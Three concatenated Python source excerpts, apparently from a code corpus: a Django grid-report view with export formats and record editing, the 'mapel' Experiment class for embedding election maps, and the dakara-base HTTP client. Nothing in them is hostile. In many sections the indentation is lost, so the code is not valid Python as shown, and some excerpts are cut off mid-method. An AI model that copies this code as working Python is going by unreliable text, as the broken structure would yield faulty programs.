| |
mode = request.GET.get("mode", None)
if mode:
# Store the mode passed in the URL on the session to remember for the next report
request.session["mode"] = mode
else:
# Pick up the mode from the session
mode = request.session.get("mode", "graph")
is_popup = "_popup" in request.GET
sidx, sord = cls.getSortName(request)
autofilter = "noautofilter" not in request.GET and cls.autofilter
filters = cls.getQueryString(request)
if not filters and request.prefs and autofilter:
# Inherit the filter settings from the preferences
filters = request.prefs.get("filter", None)
if request.prefs and autofilter:
page = request.prefs.get("page", 1) or 1
else:
page = 1
context = {
"reportclass": cls,
"title": _("%(title)s for %(entity)s")
% {"title": force_str(cls.title), "entity": force_str(args[0])}
if args and args[0]
else cls.title,
"post_title": cls.post_title,
"preferences": request.prefs,
"reportkey": reportkey,
"colmodel": cls._render_colmodel(
request, is_popup, request.prefs, mode, *args, **kwargs
),
"cross_idx": cross_idx,
"cross_list": cross_list,
"object_id": args and quote(args[0]) or None,
"page": page,
"sord": sord,
"sidx": sidx,
"default_sort": cls.defaultSortString(request),
"is_popup": is_popup,
"filters": json.loads(filters) if filters else None,
"args": args,
"bucketnames": bucketnames,
"model": cls.model,
"scenario_permissions": scenario_permissions,
"hasaddperm": cls.editable
and cls.model
and (
request.user.has_perm(
"%s.%s"
% (
cls.model._meta.app_label,
get_permission_codename("add", cls.model._meta),
)
)
or "add" not in cls.model._meta.default_permissions
),
"hasdeleteperm": cls.editable
and cls.model
and (
request.user.has_perm(
"%s.%s"
% (
cls.model._meta.app_label,
get_permission_codename("delete", cls.model._meta),
)
)
or "delete" not in cls.model._meta.default_permissions
),
"haschangeperm": cls.editable
and cls.model
and (
request.user.has_perm(
"%s.%s"
% (
cls.model._meta.app_label,
get_permission_codename("change", cls.model._meta),
)
)
or "change" not in cls.model._meta.default_permissions
),
"active_tab": "plan",
"mode": mode,
"actions": cls.actions,
}
for k, v in cls.extra_context(request, *args, **kwargs).items():
context[k] = v
return render(request, cls.template, context)
elif fmt == "json":
# Return JSON data to fill the grid.
response = StreamingHttpResponse(
content_type="application/json; charset=%s" % settings.DEFAULT_CHARSET,
streaming_content=cls._generate_json_data(request, *args, **kwargs),
)
response["Cache-Control"] = "no-cache, no-store"
return response
elif fmt in ("spreadsheetlist", "spreadsheettable", "spreadsheet"):
scenarios = request.GET.get("scenarios", None)
scenario_list = scenarios.split(",") if scenarios else [request.database]
# Make sure scenarios are in the scenario_permissions list
if scenarios:
accepted_scenarios = [t[0] for t in scenario_permissions]
scenario_list = [x for x in scenario_list if x in accepted_scenarios]
# Return an excel spreadsheet
output = BytesIO()
cls._generate_spreadsheet_data(
request, scenario_list, output, *args, **kwargs
)
response = HttpResponse(
content_type="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet",
content=output.getvalue(),
)
# Filename parameter is encoded as specified in rfc5987
if callable(cls.title):
title = cls.title(request, *args, **kwargs)
else:
title = cls.model._meta.verbose_name_plural if cls.model else cls.title
response[
"Content-Disposition"
] = "attachment; filename*=utf-8''%s.xlsx" % urllib.parse.quote(
force_str(title)
)
response["Cache-Control"] = "no-cache, no-store"
return response
elif fmt in ("csvlist", "csvtable", "csv"):
scenarios = request.GET.get("scenarios", None)
scenario_list = scenarios.split(",") if scenarios else [request.database]
# Make sure scenarios are in the scenario_permissions list
if scenarios:
accepted_scenarios = [t[0] for t in scenario_permissions]
scenario_list = [x for x in scenario_list if x in accepted_scenarios]
# Return CSV data to export the data
response = StreamingHttpResponse(
content_type="text/csv; charset=%s" % settings.CSV_CHARSET,
streaming_content=cls._generate_csv_data(
request, scenario_list, *args, **kwargs
),
)
# Filename parameter is encoded as specified in rfc5987
if callable(cls.title):
title = cls.title(request, *args, **kwargs)
else:
title = cls.model._meta.verbose_name_plural if cls.model else cls.title
response[
"Content-Disposition"
] = "attachment; filename*=utf-8''%s.csv" % urllib.parse.quote(
force_str(title)
)
response["Cache-Control"] = "no-cache, no-store"
return response
elif fmt == "kanban":
response = StreamingHttpResponse(
content_type="application/json; charset=%s" % settings.DEFAULT_CHARSET,
streaming_content=cls._generate_kanban_data(request, *args, **kwargs),
)
response["Cache-Control"] = "no-cache, no-store"
return response
elif fmt == "calendar":
response = StreamingHttpResponse(
content_type="application/json; charset=%s" % settings.DEFAULT_CHARSET,
streaming_content=cls._generate_calendar_data(request, *args, **kwargs),
)
response["Cache-Control"] = "no-cache, no-store"
return response
else:
raise Http404("Unknown format type")
    @classmethod
    def _generate_kanban_data(cls, request, *args, **kwargs):
        """Stream the report data in kanban format.

        Hook for subclasses; the base implementation rejects the format.
        """
        raise Http404("This report doesn't support the kanban format")
    @classmethod
    def _generate_calendar_data(cls, request, *args, **kwargs):
        """Stream the report data in calendar format.

        Hook for subclasses; the base implementation rejects the format.
        """
        raise Http404("This report doesn't support the calendar format")
@classmethod
def parseJSONupload(cls, request):
# Check permissions
if not cls.model or not cls.editable:
return HttpResponseForbidden(_("Permission denied"))
permname = get_permission_codename("change", cls.model._meta)
if not request.user.has_perm("%s.%s" % (cls.model._meta.app_label, permname)):
return HttpResponseForbidden(_("Permission denied"))
# Loop over the data records
resp = HttpResponse()
ok = True
with transaction.atomic(using=request.database, savepoint=False):
content_type_id = ContentType.objects.get_for_model(
cls.model, for_concrete_model=False
).pk
for rec in json.JSONDecoder().decode(
request.read().decode(request.encoding or settings.DEFAULT_CHARSET)
):
if "delete" in rec:
# Deleting records
for key in rec["delete"]:
sid = transaction.savepoint(using=request.database)
try:
obj = cls.model.objects.using(request.database).get(pk=key)
Comment(
user_id=request.user.id,
content_type_id=content_type_id,
object_pk=force_str(key),
object_repr=force_str(obj)[:200],
type="delete",
comment="Deleted %s." % force_str(obj),
).save(using=request.database)
obj.delete()
transaction.savepoint_commit(sid)
except cls.model.DoesNotExist:
transaction.savepoint_rollback(sid)
ok = False
resp.write(escape(_("Can't find %s" % key)))
resp.write("<br>")
except Exception as e:
transaction.savepoint_rollback(sid)
ok = False
resp.write(escape(e))
resp.write("<br>")
elif "copy" in rec:
# Copying records
for key in rec["copy"]:
sid = transaction.savepoint(using=request.database)
try:
obj = cls.model.objects.using(request.database).get(pk=key)
orig_repr = force_str(obj)
if isinstance(cls.model._meta.pk, CharField):
# The primary key is a string
obj.pk = "Copy of %s" % key
elif isinstance(cls.model._meta.pk, AutoField):
# The primary key is an auto-generated number
obj.pk = None
else:
raise Exception(
_("Can't copy %s") % cls.model._meta.app_label
)
obj.save(using=request.database, force_insert=True)
Comment(
user_id=request.user.pk,
content_type_id=content_type_id,
object_pk=obj.pk,
object_repr=force_str(obj)[:200],
type="add",
comment="Copied from %s." % orig_repr,
).save(using=request.database)
transaction.savepoint_commit(sid)
except cls.model.DoesNotExist:
transaction.savepoint_rollback(sid)
ok = False
resp.write(escape(_("Can't find %s" % key)))
resp.write("<br>")
except Exception as e:
transaction.savepoint_rollback(sid)
ok = False
resp.write(escape(e))
resp.write("<br>")
else:
# Editing records
pk = rec["id"]
sid = transaction.savepoint(using=request.database)
try:
obj = cls.model.objects.using(request.database).get(
pk=rec["id"]
)
del rec["id"]
for i in rec:
if (
rec[i] == "\xa0"
): # Workaround for Jqgrid issue: date field can't be set to blank
rec[i] = None
if hasattr(cls.model, "getModelForm"):
UploadForm = cls.model.getModelForm(
tuple(rec.keys()), database=request.database
)
else:
UploadForm = modelform_factory(
cls.model,
fields=tuple(rec.keys()),
formfield_callback=lambda f: (
isinstance(f, RelatedField)
and f.formfield(using=request.database)
)
or f.formfield(),
)
form = UploadForm(rec, instance=obj)
if form.has_changed():
obj = form.save(commit=False)
obj.save(using=request.database)
Comment(
user_id=request.user.pk,
content_type_id=content_type_id,
object_pk=obj.pk,
object_repr=force_str(obj),
type="change",
comment="Changed %s."
% get_text_list(form.changed_data, "and"),
).save(using=request.database)
transaction.savepoint_commit(sid)
except cls.model.DoesNotExist:
transaction.savepoint_rollback(sid)
ok = False
resp.write(escape(_("Can't find %s" % pk)))
resp.write("<br>")
except (ValidationError, ValueError):
transaction.savepoint_rollback(sid)
ok = False
for error in form.non_field_errors():
resp.write(escape("%s: %s" % (pk, error)))
resp.write("<br>")
for field in form:
for error in field.errors:
resp.write(
escape(
"%s %s: %s: %s"
% (obj.pk, field.name, rec[field.name], error)
)
)
resp.write("<br>")
except Exception as e:
transaction.savepoint_rollback(sid)
ok = False
resp.write(escape(e))
resp.write("<br>")
if ok:
resp.write("OK")
resp.status_code = ok and 200 or 500
return resp
@staticmethod
def dependent_models(m, found):
""" An auxilary method that constructs a set of all dependent models"""
for f in m._meta.get_fields():
if (
f.is_relation
and f.auto_created
and f.related_model != m
and f.related_model not in found
):
for sub in f.related_model.__subclasses__():
# if sub not in found:
found.update([sub])
found.update([f.related_model])
GridReport.dependent_models(f.related_model, found)
    @staticmethod
    def sort_models(models):
        # Order a list of model descriptors so that every model comes after
        # the models it depends on. Each entry is a tuple whose element [0]
        # is a name string, [1] the model class and [3] a set of models that
        # depend on it (element [2] is not used here -- presumably carries
        # export data; TODO confirm against callers).
        # Inject additional dependencies that are not reflected in database constraints
        for m in models:
            for e in getattr(m[1], "extra_dependencies", []):
                for m2 in models:
                    if m2[1] == e:
                        m2[3].update([m[1]])
        # Sort the list of models, based on dependencies between models
        models.sort(key=lambda m: (m[1].__name__, m[0].upper()))
        cnt = len(models)
        ok = False
        # Repeat bubbling passes until a full pass makes no change.
        while not ok:
            ok = True
            for i in range(cnt):
                j = i + 1
                while j < cnt and ok:
                    if models[i][1] != models[j][1] and models[i][1] in models[j][3]:
                        # models[i] depends on models[j] but precedes it.
                        i_base = models[i][1].__base__
                        if i_base == Model or i_base._meta.abstract:
                            i_base = None
                        j_base = models[j][1].__base__
                        if j_base == Model or j_base._meta.abstract:
                            j_base = None
                        if i_base == j_base and i_base and j_base:
                            # Siblings of the same concrete base: keep order.
                            j += 1
                            continue
                        if i_base == models[j][1] or j_base == models[i][1]:
                            # Direct parent/child relation: keep order.
                            j += 1
                            continue
                        # Move the offending entry to the end, together with
                        # every other entry for the same model class, then
                        # restart the scan.
                        models.append(models.pop(i))
                        while j < cnt:
                            if models[i][1] == models[j][1]:
                                models.append(models.pop(j))
                            j += 1
                        ok = False
                        break
                    elif (
                        models[i][1] == models[j][1]
                        and models[i][0].upper() > models[j][0].upper()
                    ):
                        # Same model registered under several names: keep the
                        # names alphabetically ordered.
                        models[i], models[j] = models[j], models[i]
                        ok = False
                    j += 1
        return models
@classmethod
def erase(cls, request):
# Build a list of dependencies
deps = set([cls.model])
# Special case for MO/PO/DO/DLVR that cannot be truncated
if cls.model.__name__ not in (
"PurchaseOrder",
"ManufacturingOrder",
"DistributionOrder",
"DeliveryOrder",
):
GridReport.dependent_models(cls.model, deps)
# Check the delete permissions for all related objects
for m in deps:
permname = get_permission_codename("delete", m._meta)
if not request.user.has_perm("%s.%s" % (m._meta.app_label, permname)):
return format_lazy(
"{}:{}", m._meta.verbose_name, _("Permission denied")
)
# Delete the data records
cursor = connections[request.database].cursor()
with transaction.atomic(using=request.database):
sql_list = []
containsOperationPlan = any(m.__name__ == "OperationPlan" for m in deps)
for m in deps:
if "getDeleteStatements" in dir(m) and not containsOperationPlan:
sql_list.extend(m.getDeleteStatements())
else:
sql_list = connections[request.database].ops.sql_flush(
no_style(), [m._meta.db_table for m in deps], []
)
for sql in sql_list:
cursor.execute(sql)
# Erase comments and history
content_ids = | |
<filename>mapel/main/objects/Experiment.py
#!/usr/bin/env python
import csv
import itertools
import logging
import math
import os
import warnings
from abc import ABCMeta, abstractmethod
import matplotlib.pyplot as plt
import networkx as nx
import numpy as np
from scipy.stats import stats
from mapel.main.embedding.kamada_kawai.kamada_kawai import KamadaKawai
COLORS = []
from PIL import Image
from mapel.main.objects.Family import Family
import mapel.elections.print_ as pr
try:
from sklearn.manifold import MDS
from sklearn.manifold import TSNE
from sklearn.manifold import SpectralEmbedding
from sklearn.manifold import LocallyLinearEmbedding
from sklearn.manifold import Isomap
except ImportError as error:
MDS = None
TSNE = None
SpectralEmbedding = None
LocallyLinearEmbedding = None
Isomap = None
print(error)
class Experiment:
__metaclass__ = ABCMeta
"""Abstract set of instances."""
    def __init__(self, instances=None, distances=None, dim=2, store=True,
                 coordinates=None, distance_id='emd-positionwise', experiment_id=None,
                 instance_type='ordinal', _import=True, clean=False, coordinates_names=None,
                 embedding_id='kamada', fast_import=False):
        """Set up an experiment, optionally importing instances, distances
        and coordinates from the experiment's directory structure.

        Each of `instances` / `distances` / `coordinates` may be supplied
        directly as a dict (no import), imported from disk when `_import`
        is true and an `experiment_id` is given, or left empty otherwise.
        """
        self._import = _import
        self.clean = clean
        self.experiment_id = experiment_id
        self.fast_import = fast_import
        if clean:
            self.clean_elections()
        self.distance_id = distance_id
        self.embedding_id = embedding_id
        # Containers filled below or lazily by other methods.
        self.instances = None
        self.distances = None
        self.coordinates = None
        self.coordinates_lists = {}
        self.families = {}
        self.times = {}
        self.stds = {}
        self.matchings = {}
        self.features = {}
        self.coordinates_by_families = {}
        self.num_families = None
        self.num_instances = None
        self.main_order = None
        self.instance_type = instance_type
        if experiment_id is None:
            # 'virtual' experiments live purely in memory; nothing is stored.
            self.experiment_id = 'virtual'
            self.store = False
        else:
            self.store = True
            self.experiment_id = experiment_id
            self.create_structure()
            self.families = self.import_controllers()
        # NOTE(review): this overrides the value set just above, so the
        # `store` argument always wins -- confirm that is intended.
        self.store = store
        if isinstance(instances, dict):
            self.instances = instances
            print('=== Omitting import! ===')
        elif _import and self.experiment_id != 'virtual':
            try:
                self.instances = self.add_instances_to_experiment()
                self.num_instances = len(self.instances)
                print('=== Elections imported successfully! ===')
            except FileNotFoundError:
                print('=== Elections not found! ===')
                self.instances = {}
        else:
            self.instances = {}
        if isinstance(distances, dict):
            self.distances = distances
            print('=== Omitting import! ===')
        elif _import and self.experiment_id != 'virtual':
            try:
                self.distances, self.times, self.stds = self.add_distances_to_experiment()
                print('=== Distances imported successfully! ===')
            except FileNotFoundError:
                print('=== Distances not found! ===')
        else:
            self.distances = {}
        if isinstance(coordinates, dict):
            self.coordinates = coordinates
            print('=== Omitting import! ===')
        elif _import and self.experiment_id != 'virtual':
            try:
                if coordinates_names is not None:
                    # Import every named coordinates file; the first one
                    # becomes the active coordinate set.
                    for file_name in coordinates_names:
                        self.coordinates_lists[file_name] = \
                            self.add_coordinates_to_experiment(dim=dim, file_name=file_name)
                    self.coordinates = self.coordinates_lists[coordinates_names[0]]
                else:
                    self.coordinates = self.add_coordinates_to_experiment(dim=dim)
                print('=== Coordinates imported successfully! ===')
            except FileNotFoundError:
                print('=== Coordinates not found! ===')
        else:
            self.coordinates = {}
        # Propagate each family's label to its member instances.
        for family_id in self.families:
            for instance_id in self.families[family_id].instance_ids:
                self.instances[instance_id].label = self.families[family_id].label
    @abstractmethod
    def prepare_instances(self):
        """Generate the experiment's instances (implemented by subclasses)."""
        pass
    @abstractmethod
    def add_instance(self):
        """Add a single instance to the experiment (implemented by subclasses)."""
        pass
    @abstractmethod
    def add_family(self):
        """Add a family of instances to the experiment (implemented by subclasses)."""
        pass
def embed(self, algorithm: str = 'spring', num_iterations: int = 1000, radius: float = np.infty,
dim: int = 2, num_neighbors: int = None, method: str = 'standard',
zero_distance: float = 0.1, factor: float = 1., saveas: str = None,
init_pos: dict = None, fixed=True) -> None:
attraction_factor = 1
if algorithm == 'spring':
attraction_factor = 2
num_elections = len(self.distances)
x = np.zeros((num_elections, num_elections))
initial_positions = None
if init_pos is not None:
initial_positions = {}
for i, instance_id_1 in enumerate(self.distances):
if instance_id_1 in init_pos:
initial_positions[i] = init_pos[instance_id_1]
for i, instance_id_1 in enumerate(self.distances):
for j, instance_id_2 in enumerate(self.distances):
if i < j:
self.distances[instance_id_1][instance_id_2] *= factor
if self.distances[instance_id_1][instance_id_2] == 0.:
self.distances[instance_id_1][instance_id_2] = zero_distance
self.distances[instance_id_2][instance_id_1] = zero_distance
if algorithm in {'spring'}:
normal = True
if self.distances[instance_id_1][instance_id_2] > radius:
x[i][j] = 0.
normal = False
if num_neighbors is not None:
tmp = self.distances[instance_id_1]
sorted_list_1 = list((dict(sorted(tmp.items(),
key=lambda item: item[1]))).keys())
tmp = self.distances[instance_id_2]
sorted_list_2 = list((dict(sorted(tmp.items(),
key=lambda item: item[1]))).keys())
if (instance_id_1 not in sorted_list_2[0:num_neighbors]) and (
instance_id_2 not in sorted_list_1[0:num_neighbors]):
x[i][j] = 0.
normal = False
if normal:
x[i][j] = 1. / self.distances[instance_id_1][
instance_id_2]
else:
x[i][j] = self.distances[instance_id_1][instance_id_2]
x[i][j] = x[i][j] ** attraction_factor
x[j][i] = x[i][j]
dt = [('weight', float)]
y = x.view(dt)
graph = nx.from_numpy_array(y)
if num_neighbors is None:
num_neighbors = 100
if algorithm.lower() == 'spring':
my_pos = nx.spring_layout(graph, iterations=num_iterations, dim=dim)
elif algorithm.lower() in {'mds'}:
my_pos = MDS(n_components=dim, dissimilarity='precomputed').fit_transform(x)
elif algorithm.lower() in {'tsne'}:
my_pos = TSNE(n_components=dim).fit_transform(x)
elif algorithm.lower() in {'se'}:
my_pos = SpectralEmbedding(n_components=dim).fit_transform(x)
elif algorithm.lower() in {'isomap'}:
my_pos = Isomap(n_components=dim, n_neighbors=num_neighbors).fit_transform(x)
elif algorithm.lower() in {'lle'}:
my_pos = LocallyLinearEmbedding(n_components=dim,
n_neighbors=num_neighbors,
max_iter=num_iterations,
method=method).fit_transform(x)
elif algorithm.lower() in {'kamada-kawai', 'kamada', 'kawai'}:
my_pos = KamadaKawai().embed(
distances=x, initial_positions=initial_positions,
fix_initial_positions=fixed
)
elif algorithm.lower() in {'geo'}:
f1 = self.import_feature('voterlikeness_sqrt')
f2 = self.import_feature('borda_diversity')
for f in f1:
if f1[f] is None:
f1[f] = 0
if f2[f] is None:
f2[f] = 0
my_pos = [[f1[e], f2[e]] for e in f1]
else:
my_pos = []
logging.warning("Unknown method!")
self.coordinates = {}
for i, instance_id in enumerate(self.distances):
self.coordinates[instance_id] = [my_pos[i][d] for d in range(dim)]
pr.adjust_the_map(self)
if self.store:
if saveas is None:
file_name = f'{algorithm}_{self.distance_id}_{str(dim)}d.csv'
else:
file_name = f'{saveas}.csv'
path = os.path.join(os.getcwd(), "experiments", self.experiment_id,
"coordinates", file_name)
with open(path, 'w', newline='') as csvfile:
writer = csv.writer(csvfile, delimiter=';')
if dim == 2:
writer.writerow(["instance_id", "x", "y"])
print(["instance_id", "x", "y"])
elif dim == 3:
writer.writerow(["instance_id", "x", "y", "z"])
ctr = 0
for instance_id in self.instances:
x = round(self.coordinates[instance_id][0], 5)
y = round(self.coordinates[instance_id][1], 5)
if dim == 2:
writer.writerow([instance_id, x, y])
elif dim == 3:
z = round(my_pos[ctr][2], 5)
writer.writerow([instance_id, x, y, z])
ctr += 1
# self.coordinates = coordinates
def print_map(self, dim: int = 2, **kwargs) -> None:
""" Print the two-dimensional embedding of multi-dimensional map of the instances """
if dim == 2:
pr.print_map_2d(self, **kwargs)
elif dim == 3:
pr.print_map_3d(self, **kwargs)
    def print_matrix(self, **kwargs):
        # Thin wrapper: delegate matrix printing to the print_ module.
        pr.print_matrix(experiment=self, **kwargs)
    @abstractmethod
    def add_instances_to_experiment(self):
        """Import the stored instances from disk (implemented by subclasses)."""
        pass
    @abstractmethod
    def add_folders_to_experiment(self):
        """Create the experiment's folder layout (implemented by subclasses)."""
        pass
    @abstractmethod
    def create_structure(self):
        """Create the on-disk directory structure (implemented by subclasses)."""
        pass
    @abstractmethod
    def import_controllers(self):
        """Import the families / controllers (implemented by subclasses)."""
        pass
def add_coordinates_to_experiment(self, dim=2, file_name=None) -> dict:
""" Import from a file precomputed coordinates of all the points --
each point refer to one instance """
coordinates = {}
if file_name is None:
file_name = f'{self.embedding_id}_{self.distance_id}_{dim}d.csv'
path = os.path.join(os.getcwd(), "experiments", self.experiment_id,
"coordinates", file_name)
print(path)
with open(path, 'r', newline='') as csv_file:
# ORIGINAL
reader = csv.DictReader(csv_file, delimiter=';')
warn = False
for row in reader:
try:
instance_id = row['instance_id']
except:
try:
instance_id = row['election_id']
except:
pass
if dim == 2:
coordinates[instance_id] = [float(row['x']), float(row['y'])]
elif dim == 3:
coordinates[instance_id] = [float(row['x']), float(row['y']), float(row['z'])]
if instance_id not in self.instances:
warn = True
# if warn:
# text = f'Possibly outdated coordinates are imported!'
# warnings.warn(text, stacklevel=2)
if warn:
text = f'Possibly outdated coordinates are imported!'
logging.warning(text)
# warnings.warn(text)
return coordinates
def compute_coordinates_by_families(self) -> None:
""" Group all points by their families """
coordinates_by_families = {}
if self.families is None:
self.families = {}
for i, instance_id in enumerate(self.instances):
ele = self.instances[instance_id]
model = ele.model_id
family_id = model
label = instance_id
color = COLORS[int(i % len(COLORS))]
alpha = 1.
self.families[instance_id] = Family(
model_id=model, family_id=family_id,
label=label, alpha=alpha,
color=color)
for family_id in self.families:
coordinates_by_families[family_id] = [[] for _ in range(3)]
coordinates_by_families[family_id][0].append(self.coordinates[family_id][0])
coordinates_by_families[family_id][1].append(self.coordinates[family_id][1])
try:
coordinates_by_families[family_id][2].append(self.coordinates[family_id][2])
except Exception:
pass
else:
for family_id in self.families:
coordinates_by_families[family_id] = [[] for _ in range(3)]
try:
for instance_id in self.families[family_id].instance_ids:
coordinates_by_families[family_id][0].append(
self.coordinates[instance_id][0])
coordinates_by_families[family_id][1].append(
self.coordinates[instance_id][1])
try:
coordinates_by_families[family_id][2].append(
self.coordinates[instance_id][2])
except Exception:
pass
except:
for instance_id in self.families[family_id].instance_ids:
coordinates_by_families[family_id][0].append(
self.coordinates[instance_id][0])
coordinates_by_families[family_id][1].append(
self.coordinates[instance_id][1])
try:
coordinates_by_families[family_id][2].append(
self.coordinates[instance_id][2])
except Exception:
pass
self.coordinates_by_families = coordinates_by_families
def get_distance(self, i, j):
""" Compute Euclidean distance in two-dimensional space"""
distance = 0.
for d in range(2):
distance += (self.coordinates[i][d] - self.coordinates[j][d]) ** 2
return math.sqrt(distance)
    def rotate(self, angle) -> None:
        """ Rotate all the points by a given angle """
        # Rotation is about the fixed pivot (0.5, 0.5) -- presumably the
        # centre of a map normalised to the unit square; confirm against
        # pr.adjust_the_map.
        for instance_id in self.instances:
            self.coordinates[instance_id][0], self.coordinates[instance_id][1] = \
                self.rotate_point(0.5, 0.5, angle, self.coordinates[instance_id][0],
                                  self.coordinates[instance_id][1])
        # Keep the cached per-family grouping in sync with the new positions.
        self.compute_coordinates_by_families()
    def reverse(self) -> None:
        """ Reverse all the points"""
        # Mirrors the map across the x axis (y is negated).
        # NOTE(review): the x assignment below is a no-op; possibly x was
        # meant to be negated as well -- confirm intent before changing.
        for instance_id in self.instances:
            self.coordinates[instance_id][0] = self.coordinates[instance_id][0]
            self.coordinates[instance_id][1] = -self.coordinates[instance_id][1]
        # Keep the cached per-family grouping in sync with the new positions.
        self.compute_coordinates_by_families()
    def update(self) -> None:
        """ Save current coordinates of all the points to the original file"""
        # NOTE(review): the file name here omits the embedding id, unlike the
        # f'{algorithm}_{distance_id}_{dim}d.csv' name written by `embed` --
        # confirm both refer to the same file.
        path = os.path.join(os.getcwd(), "experiments", self.experiment_id,
                            "coordinates", f'{self.distance_id}_2d.csv')
        with open(path, 'w', newline='') as csvfile:
            writer = csv.writer(csvfile, delimiter=';')
            writer.writerow(["instance_id", "x", "y"])
            for election_id in self.instances:
                # Round to 5 decimals, matching the precision used by `embed`.
                x = round(self.coordinates[election_id][0], 5)
                y = round(self.coordinates[election_id][1], 5)
                writer.writerow([election_id, x, y])
@staticmethod
def rotate_point(cx, cy, angle, px, py) -> (float, float):
""" Rotate two-dimensional point by an angle """
s, c = math.sin(angle), math.cos(angle)
px -= cx
py -= cy
x_new, y_new = px * c - py * s, px * s + py * c
px, py = x_new + cx, y_new + cy
return px, py
def add_distances_to_experiment(self) -> (dict, dict, dict):
""" Import precomputed distances between each pair of instances from a file """
file_name = f'{self.distance_id}.csv'
path = os.path.join(os.getcwd(), 'experiments', self.experiment_id, 'distances', file_name)
distances = {}
times = {}
stds = {}
| |
<reponame>DakaraProject/dakara-base
"""HTTP client helper module.
This module provides the HTTP client class `HTTPClient`, built on the requests
library. The class is designed to be used with an API which communicates with
JSON messages. It is pretty straightforward to use:
>>> config = {
... "url": "http://www.example.com",
... "login": "login here",
... "password": "<PASSWORD>",
... }
>>> client = HTTPClient(config, endpoint_prefix="api/")
>>> client.authenticate()
>>> data = client.get("library/songs/")
>>> client.post("library/songs", json={"title": "some title"})
"""
from functools import wraps
import logging

import requests
from furl import furl

from dakara_base.exceptions import DakaraError
from dakara_base.utils import create_url, truncate_message
logger = logging.getLogger(__name__)
def authenticated(fun):
    """Decorator that ensures the token is set.

    It makes sure that the given function is called only if authenticated. If
    not authenticated, calling the function will raise a `NotAuthenticatedError`.

    Args:
        fun (function): Function to decorate.

    Returns:
        function: Decorated function.
    """
    from functools import wraps

    # preserve the wrapped function's name/docstring for debugging and docs
    @wraps(fun)
    def call(self, *args, **kwargs):
        # reject the call early if no token was obtained via `authenticate`
        if self.token is None:
            raise NotAuthenticatedError("No connection established")

        return fun(self, *args, **kwargs)

    return call
class HTTPClient:
"""HTTP client designed to work with an API.
The API must use JSON for message content.
The client uses a token credential policy only and authenticates with a
traditional login/password mechanism.
Attributes:
AUTHENTICATE_ENDPOINT (str): Endpoint for authentication.
mute_raise (bool): If true, no exception will be raised when performing
connections with the server (but authentication), only logged.
server_url (str): URL of the server.
        token (str): Value of the token. The token is set when successfully
calling `authenticate`.
login (str): Login used for authentication.
password (str): Password used for authentication.
Args:
config (dict): Config of the server.
endpoint_prefix (str): Prefix of the endpoint, added to the URL.
mute_raise (bool): If true, no exception will be raised when performing
connections with the server (but authentication), only logged.
Raises:
ParameterError: If critical parameters cannot be found in the
configuration.
"""
    AUTHENTICATE_ENDPOINT = "accounts/login/"

    def __init__(self, config, endpoint_prefix="", mute_raise=False):
        """Initialize the client from the server config.

        Args:
            config (dict): Config of the server. Must contain the keys
                "login" and "password"; the remaining entries are forwarded
                to `create_url` to build the server URL.
            endpoint_prefix (str): Prefix of the endpoint, added to the URL.
            mute_raise (bool): If true, no exception will be raised when
                performing connections with the server (but authentication),
                only logged.

        Raises:
            ParameterError: If a required key is missing from `config`.
        """
        self.mute_raise = mute_raise

        try:
            # url
            self.server_url = create_url(**config, path=endpoint_prefix)

            # authentication
            # token stays None until `authenticate` succeeds
            self.token = None
            self.login = config["login"]
            self.password = config["password"]

        except KeyError as error:
            raise ParameterError(
                "Missing parameter in server config: {}".format(error)
            ) from error
def send_request_raw(
self,
method,
endpoint,
*args,
message_on_error="",
function_on_error=None,
**kwargs
):
"""Generic method to send requests to the server.
It takes care of errors and raises exceptions.
Args:
method (str): Name of the HTTP method to use.
endpoint (str): Endpoint to send the request to. Will be added to
the end of the server URL.
message_on_error (str): Message to display in logs in case of
error. It should describe what the request was about.
function_on_error (function): Fuction called if the request is not
successful, it will receive the response and must return an
exception that will be raised. If not provided, a basic error
management is done.
Extra arguments are passed to requests' get/post/put/patch/delete
methods.
Returns:
requests.models.Response: Response object.
Raises:
MethodError: If the method is not supported.
ResponseRequestError: For any error when communicating with the server.
ResponseInvalidError: If the response has an error code different
to 2**.
"""
# handle method function
if not hasattr(requests, method):
raise MethodError("Method {} not supported".format(method))
send_method = getattr(requests, method)
# handle message on error
if not message_on_error:
message_on_error = "Unable to request the server"
# forge URL
url = furl(self.server_url).add(path=endpoint).url
logger.debug("Sending %s request to %s", method.upper(), url)
try:
# send request to the server
response = send_method(url, *args, **kwargs)
except requests.exceptions.RequestException as error:
# handle connection error
logger.error("%s, communication error", message_on_error)
raise ResponseRequestError(
"Error when communicating with the server: {}".format(error)
) from error
# return here if the request was made without error
if response.ok:
return response
# otherwise call custom error management function
if function_on_error:
raise function_on_error(response)
# otherwise manage error generically
logger.error(message_on_error)
logger.debug(
"Error %i: %s", response.status_code, truncate_message(response.text)
)
raise ResponseInvalidError(
"Error {} when communicationg with the server: {}".format(
response.status_code, response.text
)
)
@authenticated
def send_request(self, *args, **kwargs):
"""Generic method to send requests to the server when connected.
It adds token header for authentication and takes care of errors.
If `mute_raise` is set, no exceptions are raised in case of error when
communicating with the server.
Args:
See `send_request_raw`.
Returns:
requests.models.Response: Response object. None if an error occurs
when communicating with the server and `mute_raise` is set.
Raises:
MethodError: If the method is not supported.
ResponseRequestError: For any error when communicating with the server.
ResponseInvalidError: If the response has an error code different
to 2**.
"""
try:
# make the request
return self.send_request_raw(
*args, headers=self.get_token_header(), **kwargs
)
# manage request error
except ResponseError:
if self.mute_raise:
return None
raise
def get(self, *args, **kwargs):
"""Generic method to get data on server.
Args:
endpoint (str): Endpoint to send the request to. Will be added to
the end of the server URL.
message_on_error (str): Message to display in logs in case of
error. It should describe what the request was about.
function_on_error (function): Fuction called if the request is not
successful, it will receive the response and must return an
exception that will be raised. If not provided, a basic error
management is done.
Extra arguments are passed to requests' get method.
Returns:
dict: Response object from the server.
Raises:
ResponseRequestError: For any error when communicating with the server.
ResponseInvalidError: If the response has an error code different
to 2**.
"""
return self.get_json_from_response(self.send_request("get", *args, **kwargs))
def post(self, *args, **kwargs):
"""Generic method to post data on server.
Args:
endpoint (str): Endpoint to send the request to. Will be added to
the end of the server URL.
message_on_error (str): Message to display in logs in case of
error. It should describe what the request was about.
function_on_error (function): Fuction called if the request is not
successful, it will receive the response and must return an
exception that will be raised. If not provided, a basic error
management is done.
Extra arguments are passed to requests' post method.
Returns:
dict: Response object from the server.
Raises:
ResponseRequestError: For any error when communicating with the server.
ResponseInvalidError: If the response has an error code different
to 2**.
"""
return self.get_json_from_response(self.send_request("post", *args, **kwargs))
def put(self, *args, **kwargs):
"""Generic method to put data on server.
Args:
endpoint (str): Endpoint to send the request to. Will be added to
the end of the server URL.
